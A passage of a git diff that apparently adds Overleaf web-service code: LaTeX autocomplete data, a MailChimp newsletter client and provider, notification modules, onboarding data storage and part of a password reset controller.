'rerunfilecheck-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\clearpage', + snippet: '\\clearpage', + meta: 'rerunfilecheck-cmd', + score: 0.1789117552185788, + }, + { + caption: '\\global', + snippet: '\\global', + meta: 'rerunfilecheck-cmd', + score: 0.006609629561859019, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'rerunfilecheck-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'rerunfilecheck-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'rerunfilecheck-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'rerunfilecheck-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'rerunfilecheck-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'rerunfilecheck-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'rerunfilecheck-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'rerunfilecheck-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'rerunfilecheck-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'rerunfilecheck-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'rerunfilecheck-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'rerunfilecheck-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'rerunfilecheck-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'rerunfilecheck-cmd', + score: 0.021170869458413965, + }, + ], + pdfescape: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'pdfescape-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'pdfescape-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'pdfescape-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'pdfescape-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'pdfescape-cmd', + score: 0.008565354665444157, + }, + ], + infwarerr: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'infwarerr-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\check{}', + snippet: '\\check{$1}', + meta: 'infwarerr-cmd', + score: 0.0058342578961340175, + }, + { + caption: '\\space', + snippet: '\\space', + meta: 'infwarerr-cmd', + score: 0.023010789853665694, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'infwarerr-cmd', + score: 0.008565354665444157, + }, + ], + kvsetkeys: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'kvsetkeys-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'kvsetkeys-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'kvsetkeys-cmd', + score: 0.008565354665444157, + }, + ], + gettitlestring: [ + { + caption: '\\addcontentsline{}{}{}', + snippet: '\\addcontentsline{$1}{$2}{$3}', + meta: 'gettitlestring-cmd', + score: 0.07503475348393239, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'gettitlestring-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'gettitlestring-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'gettitlestring-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'gettitlestring-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'gettitlestring-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'gettitlestring-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'gettitlestring-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'gettitlestring-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\expandafter', + snippet: '\\expandafter', + meta: 'gettitlestring-cmd', + score: 0.021170869458413965, + }, + { + caption: '\\expandafter{}', + snippet: '\\expandafter{$1}', + meta: 'gettitlestring-cmd', + score: 0.021170869458413965, + }, + ], + refcount: [ + { + caption: '\\thepage', + snippet: '\\thepage', + meta: 'refcount-cmd', + score: 0.0591555998103519, + }, + ], + bitset: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'bitset-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'bitset-cmd', + score: 0.008565354665444157, + }, + ], + etexcmds: [ + { + caption: '\\csname', + snippet: '\\csname', + meta: 'etexcmds-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\empty', + snippet: '\\empty', + meta: 'etexcmds-cmd', + score: 0.002958865219480927, + }, + ], + intcalc: [ + { + caption: '\\empty', + snippet: '\\empty', + meta: 'intcalc-cmd', + score: 0.002958865219480927, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'intcalc-cmd', + score: 0.008565354665444157, + }, + ], + hycolor: [ + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hycolor-cmd', + score: 0.00530510025314411, + }, + { + caption: '\\csname', + snippet: '\\csname', + meta: 'hycolor-cmd', + score: 0.008565354665444157, + }, + { + caption: '\\noexpand', + snippet: '\\noexpand', + meta: 'hycolor-cmd', + score: 0.00530510025314411, + }, + ], +} diff --git a/services/web/app/src/Features/Newsletter/MailChimpClient.js b/services/web/app/src/Features/Newsletter/MailChimpClient.js new file mode 100644 index 0000000..525ef33 --- /dev/null +++ b/services/web/app/src/Features/Newsletter/MailChimpClient.js @@ -0,0 +1,68 @@ +const { fetchJson, fetchNothing } = require('@overleaf/fetch-utils') + +class MailChimpClient { + constructor(apiKey) { + this.apiKey = apiKey + this.dc = apiKey.split('-')[1] + this.baseUrl = `https://${this.dc}.api.mailchimp.com/3.0/` + this.fetchOptions = { + method: 'GET', + basicAuth: { + user: 'any', + password: this.apiKey, + }, + } + } + + async request(path, options) { + try { + const requestUrl = `${this.baseUrl}${path}` + if (options.method === 'GET') { + return await fetchJson(requestUrl, options) + } + await fetchNothing(requestUrl, options) + } catch (err) { + // if there's a json body in the response, expose it in the error (for compatibility with node-mailchimp) + const errorBody = err.body ? JSON.parse(err.body) : {} + const errWithBody = Object.assign(err, errorBody) + throw errWithBody + } + } + + async get(path) { + return await this.request(path, this.fetchOptions) + } + + async put(path, body) { + const options = Object.assign({}, this.fetchOptions) + options.method = 'PUT' + options.json = body + + return await this.request(path, options) + } + + async post(path, body) { + const options = Object.assign({}, this.fetchOptions) + options.method = 'POST' + options.json = body + + return await this.request(path, options) + } + + async delete(path) { + const options = Object.assign({}, this.fetchOptions) + options.method = 'DELETE' + + return await this.request(path, options) + } + + async patch(path, body) { + const options = Object.assign({}, this.fetchOptions) + options.method = 'PATCH' + options.json = body + + return await this.request(path, options) + } +} + +module.exports = MailChimpClient diff --git a/services/web/app/src/Features/Newsletter/MailChimpProvider.js b/services/web/app/src/Features/Newsletter/MailChimpProvider.js new file mode 100644 index 0000000..9310ce9 --- /dev/null +++ b/services/web/app/src/Features/Newsletter/MailChimpProvider.js @@ -0,0 +1,315 @@ +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') +const crypto = require('crypto') +const OError = require('@overleaf/o-error') +const { callbackify } = require('util') +const MailChimpClient = require('./MailChimpClient') + +function mailchimpIsConfigured() { + return Settings.mailchimp != null && Settings.mailchimp.api_key != null +} + +function make(listName, listId) { + let provider + if (!mailchimpIsConfigured() || !listId) { + logger.debug({ listName }, 'Using newsletter provider: none') + provider = makeNullProvider(listName) + } else { + logger.debug({ listName }, 'Using newsletter provider: mailchimp') + provider = makeMailchimpProvider(listName, listId) + } + return { + subscribed: callbackify(provider.subscribed), + subscribe: callbackify(provider.subscribe), + unsubscribe: callbackify(provider.unsubscribe), + changeEmail: callbackify(provider.changeEmail), + tag: callbackify(provider.tag), + removeTag: callbackify(provider.removeTag), + promises: provider, + } +} + +module.exports = { + make, +} + +class NonFatalEmailUpdateError extends OError { + constructor(message, oldEmail, newEmail) { + super(message, { oldEmail, newEmail }) + } +} + +function makeMailchimpProvider(listName, listId) { + const mailchimp = new MailChimpClient(Settings.mailchimp.api_key) + const MAILCHIMP_LIST_ID = listId + + return { + subscribed, + subscribe, + unsubscribe, + changeEmail, + tag, + removeTag, + } + + async function subscribed(user) { + try { + const path = getSubscriberPath(user.email) + const result = await mailchimp.get(path) + return result?.status === 'subscribed' + } catch (err) { + if (err?.response?.status === 404) { + return false + } + throw OError.tag(err, 'error getting newsletter subscriptions status', { + userId: user._id, + listName, + }) + } + } + + async function subscribe(user) { + try { + const path = getSubscriberPath(user.email) + await mailchimp.put(path, { + email_address: user.email, + status: 'subscribed', + status_if_new: 'subscribed', + merge_fields: getMergeFields(user), + }) + logger.debug( + { user, listName }, + 'finished subscribing user to newsletter' + ) + } catch (err) { + throw OError.tag(err, 'error subscribing user to newsletter', { + userId: user._id, + listName, + }) + } + } + + async function tag(user, tag) { + try { + const path = getMemberTagsPath(user.email) + await mailchimp.post(path, { + tags: [{ name: tag, status: 'active' }], + }) + logger.debug({ user, listName }, `finished adding ${tag} to user`) + } catch (err) { + throw OError.tag(err, `error adding ${tag} to user`, { + userId: user._id, + listName, + tag, + }) + } + } + + async function removeTag(user, tag) { + try { + const path = getMemberTagsPath(user.email) + await mailchimp.post(path, { + tags: [{ name: tag, status: 'inactive' }], + }) + logger.debug({ user, listName }, `finished removing ${tag} from user`) + } catch (err) { + throw OError.tag(err, `error removing ${tag} from user`, { + userId: user._id, + listName, + tag, + }) + } + } + + async function unsubscribe(user, options = {}) { + try { + const path = getSubscriberPath(user.email) + if (options.delete) { + await mailchimp.delete(path) + } else { + await mailchimp.patch(path, { + status: 'unsubscribed', + merge_fields: getMergeFields(user), + }) + } + logger.debug( + { user, options, listName }, + 'finished unsubscribing user from newsletter' + ) + } catch (err) { + if ([404, 405].includes(err?.response?.status)) { + // silently ignore users who were never subscribed (404) or previously deleted (405) + return + } + + if (err.message.includes('looks fake or invalid')) { + logger.debug( + { err, user, options, listName }, + 'Mailchimp declined to unsubscribe user because it finds the email looks fake' + ) + return + } + + throw OError.tag(err, 'error unsubscribing user from newsletter', { + userId: user._id, + listName, + }) + } + } + + async function changeEmail(user, newEmail) { + const oldEmail = user.email + + try { + await updateEmailInMailchimp(user, newEmail) + } catch (updateError) { + // if we failed to update the user, delete their old email address so that + // we don't leave it stuck in mailchimp + logger.debug( + { oldEmail, newEmail, updateError, listName }, + 'unable to change email in newsletter, removing old mail' + ) + + try { + await unsubscribe(user, { delete: true }) + } catch (unsubscribeError) { + // something went wrong removing the user's address + throw OError.tag( + unsubscribeError, + 'error unsubscribing old email in response to email change failure', + { oldEmail, newEmail, updateError, listName } + ) + } + + if (!(updateError instanceof NonFatalEmailUpdateError)) { + throw updateError + } + } + } + + async function updateEmailInMailchimp(user, newEmail) { + const oldEmail = user.email + + // mailchimp doesn't give us error codes, so we have to parse the message :'( + const errors = { + 'merge fields were invalid': 'user has never subscribed', + 'could not be validated': + 'user has previously unsubscribed or new email already exist on list', + 'is already a list member': 'new email is already on mailing list', + 'looks fake or invalid': 'mail looks fake to mailchimp', + } + + try { + const path = getSubscriberPath(oldEmail) + await mailchimp.patch(path, { + email_address: newEmail, + merge_fields: getMergeFields(user), + }) + logger.debug( + { newEmail, listName }, + 'finished changing email in the newsletter' + ) + } catch (err) { + // silently ignore users who were never subscribed + if (err.status === 404) { + return + } + + // look through expected mailchimp errors and log if we find one + Object.keys(errors).forEach(key => { + if (err.message.includes(key)) { + const message = `unable to change email in newsletter, ${errors[key]}` + + logger.debug({ oldEmail, newEmail, listName }, message) + + throw new NonFatalEmailUpdateError( + message, + oldEmail, + newEmail + ).withCause(err) + } + }) + + // if we didn't find an expected error, generate something to throw + throw OError.tag(err, 'error changing email in newsletter', { + oldEmail, + newEmail, + listName, + }) + } + } + + function getSubscriberPath(email) { + const emailHash = hashEmail(email) + return `/lists/${MAILCHIMP_LIST_ID}/members/${emailHash}` + } + + function getMemberTagsPath(email) { + const emailHash = hashEmail(email) + return `/lists/${MAILCHIMP_LIST_ID}/members/${emailHash}/tags` + } + + function hashEmail(email) { + return crypto.createHash('md5').update(email.toLowerCase()).digest('hex') + } + + function getMergeFields(user) { + return { + FNAME: user.first_name, + LNAME: user.last_name, + MONGO_ID: user._id.toString(), + } + } +} + +function makeNullProvider(listName) { + return { + subscribed, + subscribe, + unsubscribe, + changeEmail, + tag, + removeTag, + } + + async function subscribed(user) { + logger.debug( + { user, listName }, + 'Not checking user because no newsletter provider is configured' + ) + return false + } + + async function subscribe(user) { + logger.debug( + { user, listName }, + 'Not subscribing user to newsletter because no newsletter provider is configured' + ) + } + + async function unsubscribe(user) { + logger.debug( + { user, listName }, + 'Not unsubscribing user from newsletter because no newsletter provider is configured' + ) + } + + async function changeEmail(user, newEmail) { + logger.debug( + { userId: user._id, newEmail, listName }, + 'Not changing email in newsletter for user because no newsletter provider is configured' + ) + } + async function tag(user, tag) { + logger.debug( + { userId: user._id, tag, listName }, + 'Not tagging user because no newsletter provider is configured' + ) + } + async function removeTag(user, tag) { + logger.debug( + { userId: user._id, tag, listName }, + 'Not removing tag for user because no newsletter provider is configured' + ) + } +} diff --git a/services/web/app/src/Features/Newsletter/NewsletterManager.js b/services/web/app/src/Features/Newsletter/NewsletterManager.js new file mode 100644 index 0000000..ebae9f2 --- /dev/null +++ b/services/web/app/src/Features/Newsletter/NewsletterManager.js @@ -0,0 +1,9 @@ +const Settings = require('@overleaf/settings') +const MailchimpProvider = require('./MailChimpProvider') + +const provider = MailchimpProvider.make( + 'newsletter', + Settings.mailchimp ? Settings.mailchimp.list_id : null +) + +module.exports = provider diff --git a/services/web/app/src/Features/Notifications/NotificationsBuilder.js b/services/web/app/src/Features/Notifications/NotificationsBuilder.js new file mode 100644 index 0000000..a6fedaf --- /dev/null +++ b/services/web/app/src/Features/Notifications/NotificationsBuilder.js @@ -0,0 +1,325 @@ +const NotificationsHandler = require('./NotificationsHandler') +const { promisifyAll } = require('@overleaf/promise-utils') +const request = require('request') +const settings = require('@overleaf/settings') + +function dropboxDuplicateProjectNames(userId) { + return { + key: `dropboxDuplicateProjectNames-${userId}`, + create(projectName, callback) { + if (callback == null) { + callback = function () {} + } + NotificationsHandler.createNotification( + userId, + this.key, + 'notification_dropbox_duplicate_project_names', + { projectName }, + null, + true, + callback + ) + }, + read(callback) { + if (callback == null) { + callback = function () {} + } + NotificationsHandler.markAsReadWithKey(userId, this.key, callback) + }, + } +} + +function dropboxUnlinkedDueToLapsedReconfirmation(userId) { + return { + key: 'drobox-unlinked-due-to-lapsed-reconfirmation', + create(callback) { + NotificationsHandler.createNotification( + userId, + this.key, + 'notification_dropbox_unlinked_due_to_lapsed_reconfirmation', + {}, + null, + true, + callback + ) + }, + read(callback) { + NotificationsHandler.markAsReadWithKey(userId, this.key, callback) + }, + } +} + +function featuresUpgradedByAffiliation(affiliation, user) { + return { + key: `features-updated-by=${affiliation.institutionId}`, + create(callback) { + if (callback == null) { + callback = function () {} + } + const messageOpts = { institutionName: affiliation.institutionName } + NotificationsHandler.createNotification( + user._id, + this.key, + 'notification_features_upgraded_by_affiliation', + messageOpts, + null, + false, + callback + ) + }, + read(callback) { + if (callback == null) { + callback = function () {} + } + NotificationsHandler.markAsReadWithKey(user._id, this.key, callback) + }, + } +} + +function redundantPersonalSubscription(affiliation, user) { + return { + key: `redundant-personal-subscription-${affiliation.institutionId}`, + create(callback) { + if (callback == null) { + callback = function () {} + } + const messageOpts = { institutionName: affiliation.institutionName } + NotificationsHandler.createNotification( + user._id, + this.key, + 'notification_personal_subscription_not_required_due_to_affiliation', + messageOpts, + null, + false, + callback + ) + }, + read(callback) { + if (callback == null) { + callback = function () {} + } + NotificationsHandler.markAsReadWithKey(user._id, this.key, callback) + }, + } +} + +function projectInvite(invite, project, sendingUser, user) { + return { + key: `project-invite-${invite._id}`, + create(callback) { + if (callback == null) { + callback = function () {} + } + const messageOpts = { + userName: sendingUser.first_name, + projectName: project.name, + projectId: project._id.toString(), + token: invite.token, + } + NotificationsHandler.createNotification( + user._id, + this.key, + 'notification_project_invite', + messageOpts, + invite.expires, + callback + ) + }, + read(callback) { + if (callback == null) { + callback = function () {} + } + NotificationsHandler.markAsReadByKeyOnly(this.key, callback) + }, + } +} + +function ipMatcherAffiliation(userId) { + return { + create(ip, callback) { + if (callback == null) { + callback = function () {} + } + if (!settings.apis.v1.url) { + // service is not configured + return callback() + } + request( + { + method: 'GET', + url: `${settings.apis.v1.url}/api/v2/users/${userId}/ip_matcher`, + auth: { user: settings.apis.v1.user, pass: settings.apis.v1.pass }, + body: { ip }, + json: true, + timeout: settings.apis.v1.timeout, + }, + function (error, response, body) { + if (error != null) { + return callback(error) + } + if (response.statusCode !== 200) { + return callback() + } + + const key = `ip-matched-affiliation-${body.id}` + const portalPath = body.portal_slug + ? `/${body.is_university ? 'edu' : 'org'}/${body.portal_slug}` + : undefined + const messageOpts = { + university_name: body.name, + institutionId: body.id, + content: body.enrolment_ad_html, + portalPath, + ssoEnabled: body.sso_enabled, + } + NotificationsHandler.createNotification( + userId, + key, + 'notification_ip_matched_affiliation', + messageOpts, + null, + false, + callback + ) + } + ) + }, + + read(universityId, callback) { + if (callback == null) { + callback = function () {} + } + const key = `ip-matched-affiliation-${universityId}` + NotificationsHandler.markAsReadWithKey(userId, key, callback) + }, + } +} + +function tpdsFileLimit(userId) { + return { + key: `tpdsFileLimit-${userId}`, + create(projectName, projectId, callback) { + if (callback == null) { + callback = function () {} + } + const messageOpts = { + projectName, + projectId, + } + NotificationsHandler.createNotification( + userId, + this.key, + 'notification_tpds_file_limit', + messageOpts, + null, + true, + callback + ) + }, + read(callback) { + if (callback == null) { + callback = function () {} + } + NotificationsHandler.markAsReadByKeyOnly(this.key, callback) + }, + } +} + +function groupInvitation(userId, subscriptionId, managedUsersEnabled) { + return { + key: `groupInvitation-${subscriptionId}-${userId}`, + create(invite, callback) { + if (callback == null) { + callback = function () {} + } + const messageOpts = { + token: invite.token, + inviterName: invite.inviterName, + managedUsersEnabled, + } + NotificationsHandler.createNotification( + userId, + this.key, + 'notification_group_invitation', + messageOpts, + null, + true, + callback + ) + }, + read(callback) { + if (callback == null) { + callback = function () {} + } + NotificationsHandler.markAsReadByKeyOnly(this.key, callback) + }, + } +} + +function personalAndGroupSubscriptions(userId) { + return { + key: 'personal-and-group-subscriptions', + create(callback) { + if (callback == null) { + callback = function () {} + } + NotificationsHandler.createNotification( + userId, + this.key, + 'notification_personal_and_group_subscriptions', + {}, + null, + false, + callback + ) + }, + read(callback) { + if (callback == null) { + callback = function () {} + } + NotificationsHandler.markAsReadByKeyOnly(this.key, callback) + }, + } +} + +const NotificationsBuilder = { + // Note: notification keys should be url-safe + dropboxUnlinkedDueToLapsedReconfirmation, + dropboxDuplicateProjectNames, + featuresUpgradedByAffiliation, + redundantPersonalSubscription, + projectInvite, + ipMatcherAffiliation, + tpdsFileLimit, + groupInvitation, + personalAndGroupSubscriptions, +} + +NotificationsBuilder.promises = { + dropboxUnlinkedDueToLapsedReconfirmation: function (userId) { + return promisifyAll(dropboxUnlinkedDueToLapsedReconfirmation(userId)) + }, + redundantPersonalSubscription: function (affiliation, user) { + return promisifyAll(redundantPersonalSubscription(affiliation, user)) + }, + dropboxDuplicateProjectNames(userId) { + return promisifyAll(dropboxDuplicateProjectNames(userId)) + }, + featuresUpgradedByAffiliation: function (affiliation, user) { + return promisifyAll(featuresUpgradedByAffiliation(affiliation, user)) + }, + ipMatcherAffiliation: function (userId) { + return promisifyAll(ipMatcherAffiliation(userId)) + }, + groupInvitation: function (userId, groupId, managedUsersEnabled) { + return promisifyAll(groupInvitation(userId, groupId, managedUsersEnabled)) + }, + projectInvite(invite, project, sendingUser, user) { + return promisifyAll(projectInvite(invite, project, sendingUser, user)) + }, + personalAndGroupSubscriptions(userId) { + return promisifyAll(personalAndGroupSubscriptions(userId)) + }, +} + +module.exports = NotificationsBuilder diff --git a/services/web/app/src/Features/Notifications/NotificationsController.mjs b/services/web/app/src/Features/Notifications/NotificationsController.mjs new file mode 100644 index 0000000..ae1d920 --- /dev/null +++ b/services/web/app/src/Features/Notifications/NotificationsController.mjs @@ -0,0 +1,36 @@ +import NotificationsHandler from './NotificationsHandler.js' +import SessionManager from '../Authentication/SessionManager.js' +import _ from 'lodash' + +export default { + getAllUnreadNotifications(req, res, next) { + const userId = SessionManager.getLoggedInUserId(req.session) + NotificationsHandler.getUserNotifications( + userId, + function (err, unreadNotifications) { + if (err) { + return next(err) + } + unreadNotifications = _.map( + unreadNotifications, + function (notification) { + notification.html = req.i18n.translate( + notification.templateKey, + notification.messageOpts + ) + return notification + } + ) + res.json(unreadNotifications) + } + ) + }, + + markNotificationAsRead(req, res) { + const userId = SessionManager.getLoggedInUserId(req.session) + const { notificationId } = req.params + NotificationsHandler.markAsRead(userId, notificationId, () => + res.sendStatus(200) + ) + }, +} diff --git a/services/web/app/src/Features/Notifications/NotificationsHandler.js b/services/web/app/src/Features/Notifications/NotificationsHandler.js new file mode 100644 index 0000000..4958ad8 --- /dev/null +++ b/services/web/app/src/Features/Notifications/NotificationsHandler.js @@ -0,0 +1,142 @@ +const settings = require('@overleaf/settings') +const request = require('request') +const logger = require('@overleaf/logger') +const _ = require('lodash') +const { promisifyAll } = require('@overleaf/promise-utils') + +const notificationsApi = _.get(settings, ['apis', 'notifications', 'url']) +const oneSecond = 1000 + +const makeRequest = function (opts, callback) { + if (notificationsApi) { + request(opts, callback) + } else { + callback(null, { statusCode: 200 }) + } +} + +const NotificationsHandler = { + getUserNotifications(userId, callback) { + const opts = { + uri: `${notificationsApi}/user/${userId}`, + json: true, + timeout: oneSecond, + method: 'GET', + } + makeRequest(opts, function (err, res, unreadNotifications) { + const statusCode = res ? res.statusCode : 500 + if (err || statusCode !== 200) { + logger.err( + { err, statusCode }, + 'something went wrong getting notifications' + ) + callback(null, []) + } else { + if (unreadNotifications == null) { + unreadNotifications = [] + } + callback(null, unreadNotifications) + } + }) + }, + + createNotification( + userId, + key, + templateKey, + messageOpts, + expiryDateTime, + forceCreate, + callback + ) { + if (!callback) { + callback = forceCreate + forceCreate = true + } + const payload = { + key, + messageOpts, + templateKey, + forceCreate, + } + if (expiryDateTime) { + payload.expires = expiryDateTime + } + const opts = { + uri: `${notificationsApi}/user/${userId}`, + timeout: oneSecond, + method: 'POST', + json: payload, + } + makeRequest(opts, callback) + }, + + markAsReadWithKey(userId, key, callback) { + const opts = { + uri: `${notificationsApi}/user/${userId}`, + method: 'DELETE', + timeout: oneSecond, + json: { + key, + }, + } + makeRequest(opts, callback) + }, + + markAsRead(userId, notificationId, callback) { + const opts = { + method: 'DELETE', + uri: `${notificationsApi}/user/${userId}/notification/${notificationId}`, + timeout: oneSecond, + } + makeRequest(opts, callback) + }, + + // removes notification by key, without regard for user_id, + // should not be exposed to user via ui/router + markAsReadByKeyOnly(key, callback) { + const opts = { + uri: `${notificationsApi}/key/${key}`, + method: 'DELETE', + timeout: oneSecond, + } + makeRequest(opts, callback) + }, + + previewMarkAsReadByKeyOnlyBulk(key, callback) { + const opts = { + uri: `${notificationsApi}/key/${key}/count`, + method: 'GET', + timeout: 10 * oneSecond, + json: true, + } + makeRequest(opts, (err, res, body) => { + if (err) return callback(err) + if (res.statusCode !== 200) { + return callback( + new Error('cannot preview bulk delete notification: ' + key) + ) + } + callback(null, (body && body.count) || 0) + }) + }, + + markAsReadByKeyOnlyBulk(key, callback) { + const opts = { + uri: `${notificationsApi}/key/${key}/bulk`, + method: 'DELETE', + timeout: 10 * oneSecond, + json: true, + } + makeRequest(opts, (err, res, body) => { + if (err) return callback(err) + if (res.statusCode !== 200) { + return callback(new Error('cannot bulk delete notification: ' + key)) + } + callback(null, (body && body.count) || 0) + }) + }, +} + +NotificationsHandler.promises = promisifyAll(NotificationsHandler) +module.exports = NotificationsHandler diff --git a/services/web/app/src/Features/OnboardingDataCollection/OnboardingDataCollectionManager.js b/services/web/app/src/Features/OnboardingDataCollection/OnboardingDataCollectionManager.js new file mode 100644 index 0000000..fb4fa84 --- /dev/null +++ b/services/web/app/src/Features/OnboardingDataCollection/OnboardingDataCollectionManager.js @@ -0,0 +1,77 @@ +const { + OnboardingDataCollection, + OnboardingDataCollectionSchema, +} = require('../../models/OnboardingDataCollection') +const OError = require('@overleaf/o-error') + +async function getOnboardingDataCollection(userId, projection = {}) { + try { + return await OnboardingDataCollection.findOne( + { _id: userId }, + projection + ).exec() + } catch (error) { + throw OError.tag(error, 'Failed to get OnboardingDataCollection') + } +} + +async function getOnboardingDataValue(userId, key) { + if (!OnboardingDataCollectionSchema.paths[key]) { + throw new Error(`${key} is not a valid onboarding data key`) + } + + const result = await getOnboardingDataCollection(userId, { [key]: 1 }) + return result ? result[key] : null +} + +async function upsertOnboardingDataCollection({ + userId, + firstName, + lastName, + usedLatex, + primaryOccupation, + companyDivisionDepartment, + companyJobTitle, + governmentJobTitle, + institutionName, + otherJobTitle, + nonprofitDivisionDepartment, + nonprofitJobTitle, + role, + subjectArea, + updatedAt, +}) { + const odc = await OnboardingDataCollection.findOneAndUpdate( + { _id: userId }, + { + firstName, + lastName, + usedLatex, + primaryOccupation, + companyDivisionDepartment, + companyJobTitle, + governmentJobTitle, + institutionName, + otherJobTitle, + nonprofitDivisionDepartment, + nonprofitJobTitle, + role, + subjectArea, + updatedAt, + }, + { upsert: true } + ) + + return odc +} + +function deleteOnboardingDataCollection(id) { + return OnboardingDataCollection.deleteOne({ _id: id }) +} + +module.exports = { + getOnboardingDataCollection, + upsertOnboardingDataCollection, + deleteOnboardingDataCollection, + getOnboardingDataValue, +} diff --git a/services/web/app/src/Features/PasswordReset/PasswordResetController.mjs b/services/web/app/src/Features/PasswordReset/PasswordResetController.mjs new file mode 100644 index 0000000..40e3a06 --- /dev/null +++ b/services/web/app/src/Features/PasswordReset/PasswordResetController.mjs @@ -0,0 +1,237 @@ +import PasswordResetHandler from './PasswordResetHandler.mjs' +import AuthenticationController from '../Authentication/AuthenticationController.js' +import AuthenticationManager from '../Authentication/AuthenticationManager.js' +import SessionManager from '../Authentication/SessionManager.js' +import UserGetter from '../User/UserGetter.js' +import UserUpdater from '../User/UserUpdater.js' +import UserSessionsManager from '../User/UserSessionsManager.js' +import OError from '@overleaf/o-error' +import EmailsHelper from '../Helpers/EmailHelper.js' +import { expressify } from '@overleaf/promise-utils' +import SplitTestHandler from '../SplitTests/SplitTestHandler.js' + +async function setNewUserPassword(req, res, next) { + let user + let { passwordResetToken, password, email } = req.body + if (!passwordResetToken || !password) { + return res.status(400).json({ + message: { + key: 'invalid-password', + }, + }) + } + + const err = AuthenticationManager.validatePassword(password, email) + if (err) { + const message = AuthenticationManager.getMessageForInvalidPasswordError( + err, + req + ) + return res.status(400).json({ message }) + } + + passwordResetToken = passwordResetToken.trim() + + const initiatorId = SessionManager.getLoggedInUserId(req.session) + // password reset via tokens can be done while logged in, or not + const auditLog = { + initiatorId, + ip: req.ip, + } + + try { + const result = await PasswordResetHandler.promises.setNewUserPassword( + passwordResetToken, + password, + auditLog + ) + const { found, reset, userId, mustReconfirm } = result + if (!found) { + return res.status(404).json({ + message: { + key: 'token-expired', + }, + }) + } + if (!reset) { + return res.status(500).json({ + message: req.i18n.translate('error_performing_request'), + }) + } + await UserSessionsManager.promises.removeSessionsFromRedis({ _id: userId }) + if (mustReconfirm) { + await UserUpdater.promises.removeReconfirmFlag(userId, auditLog) + } + if (!req.session.doLoginAfterPasswordReset) { + return res.sendStatus(200) + } + user = await UserGetter.promises.getUser(userId) + } catch (error) { + if (error.name === 'NotFoundError') { + return res.status(404).json({ + message: { + key: 'token-expired', + }, + }) + } else if (error.name === 'InvalidPasswordError') { + return res.status(400).json({ + message: { + key: 'invalid-password', + }, + }) + } else if (error.name === 'PasswordMustBeDifferentError') { + return res.status(400).json({ + message: { + key: 'password-must-be-different', + }, + }) + } else if (error.name === 'PasswordReusedError') { + return res.status(400).json({ + message: { + key: 'password-must-be-strong', + }, + }) + } else { + return res.status(500).json({ + message: req.i18n.translate('error_performing_request'), + }) + } + } + AuthenticationController.setAuditInfo(req, { + method: 'Password reset, set new password', + }) + AuthenticationController.finishLogin(user, req, res, next) +} + +async function requestReset(req, res, next) { + const email = EmailsHelper.parseEmail(req.body.email) + if (!email) { + return res.status(400).json({ + message: req.i18n.translate('must_be_email_address'), + }) + } + + let status + try { + status = + await PasswordResetHandler.promises.generateAndEmailResetToken(email) + } catch (err) { + OError.tag(err, 'failed to generate and email password reset token', { + email, + }) + if (err.message === 'user does not have permission for change-password') { + return res.status(403).json({ + message: { + key: 'no-password-allowed-due-to-sso', + }, + }) + } + throw err + } + + if (status === 'primary') { + return res.status(200).json({ + message: req.i18n.translate('password_reset_email_sent'), + }) + } else if (status === 'secondary') { + return res.status(404).json({ + message: req.i18n.translate('secondary_email_password_reset'), + }) + } else { + return res.status(404).json({ + message: req.i18n.translate('cant_find_email'), + }) + } +} + +async function renderSetPasswordForm(req, res, next) { + const { variant } = await 